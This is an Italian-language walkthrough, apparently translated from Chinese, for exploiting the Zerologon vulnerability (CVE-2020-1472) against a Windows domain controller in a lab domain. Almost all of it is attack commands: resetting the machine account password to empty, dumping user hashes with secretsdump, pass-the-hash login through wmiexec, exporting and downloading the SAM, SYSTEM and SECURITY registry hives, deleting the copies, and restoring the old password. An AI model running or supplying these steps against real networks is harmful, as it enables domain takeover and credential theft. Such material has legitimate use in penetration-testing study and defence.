
Exploit per CVE-2020-1472 (Zerologon) che reimposta la password dell'account macchina del controller di dominio, consentendo il dump delle credenziali e l'escalation dei privilegi ad amministratore di dominio.
@toc
Il principio è piuttosto complesso; se siete interessati, potete consultare l'articolo al seguente link: https://www.freebuf.com/articles/system/249860.html
È necessario utilizzare il file https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py per sostituire il file nrpc sulla macchina locale. Il percorso di archiviazione del file nrpc locale è: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py 机器账户名 ip
E si scopre che la password dell'account macchina è già stata azzerata; 31dc... rappresenta la password vuota.

Modalità per ottenere l'account macchina della controparte, o meglio il nome NetBIOS:
- net view
Questo nome del server, con l'aggiunta di $, è il nome della macchina, ad esempio lisi$ oppure yukong$.
- nbtstat -A ip
I modi per determinare l'IP del domain controller sono molti, ad esempio:
- Controllare gli host con la porta 53 aperta
- net time: l'output restituisce il nome host del domain controller; a questo punto basta un ping
- Con il comando systeminfo si osserva il valore relativo al dominio; un ping e si ottiene l'IP del domain controller
- Controllare il DNS del proprio host
python secretsdump.py test.com/[email protected] -no-pass
Si scopre che a questo punto è possibile usare l'account macchina con password vuota per leggere gli hash degli utenti sul domain controller.
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected]
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
Al termine dell'esecuzione, è possibile trovare i file scaricati nella cartella in cui si trova lo script wmiexec:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss L'esecuzione di questo comando fallisce.
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Salvare la password evidenziata nel cerchio rosso: questa è la vecchia password della macchina, vale a dire aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
Si scopre che il ripristino è riuscito.